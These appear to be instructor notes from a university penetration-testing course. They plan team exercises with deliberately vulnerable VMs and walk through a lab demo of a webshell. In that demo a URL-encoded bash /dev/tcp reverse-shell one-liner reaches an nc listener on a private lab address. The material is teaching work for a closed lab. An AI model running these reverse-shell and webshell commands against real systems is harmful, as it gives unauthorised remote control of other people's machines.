Pen-Testing Comps
Wednesday, 17 January 2024

+ SQLi presentation
+ Discuss presentation strengths
  - show us the code
  - clear demo: normal behavior + bad behavior
  - multi-modal explanations
    - here's the code
    - here's what happens
    - here's an explanation of what happened
    - how to fix it, and a demo thereof
+ The plan for Monday and Wednesday
  - In your teams...
    - Create a Target VM
    - Give it a vulnerability that an attacker on the same network as your Target could find and exploit
    - Export your VM
    - Share it with somebody else on your team
    - See if they can run it and attack it from their host machine
    - Share the export in a way that I will describe later
  - Monday to Wednesday: attack a few of the other teams' machines
+ Kali installation on Apple Silicon
+ Topics for soon
  - General pen testing methodology
  - Reverse shells
  - Publicly available exploits and how to find them
  - ...

=============

+ The Demo of a Reverse Shell That Jeff Couldn't Get to Work Until 3 Minutes After Returning to his Office

Step 0: set up your Target
  - I used Kali as my target, with Apache as my web server

Step 1: put a webshell on the Target's website
  - Here's my webshell.php

Step 3: test the webshell from your Attacker (e.g., my Mac terminal or browser)
  http://IP_OF_KALI/webshell.php?command=whoami

Step 4: launch a listener on your Attacker
  nc -lvnp 4444

Step 5: use the web shell to run this (172.16.41.1 is the Attacker's IP, the machine nc is listening on):
  bash -c "bash -i >& /dev/tcp/172.16.41.1/4444 0>&1"
  but note that ampersands are very special in URLs (they separate one query parameter from the next), so you need to "url-encode" them as %26. Also, spaces in URLs cause trouble, so they become %20. So this needs to be:
  bash%20-c%20"bash%20-i%20>%26%20/dev/tcp/172.16.41.1/4444%200>%261"
  So, use this URL in either a browser or curl (if you paste it into a terminal, wrap the whole URL in single quotes, or the shell will strip the double quotes and treat the ">" as a redirection before curl ever sees the URL):
  http://IP_OF_KALI/webshell.php?command=bash%20-c%20"bash%20-i%20>%26%20/dev/tcp/172.16.41.1/4444%200>%261"

Step 6: look back at your nc listener; got a shell on the Target?

LAST QUESTION: WTH is going on here? How does all this craziness work?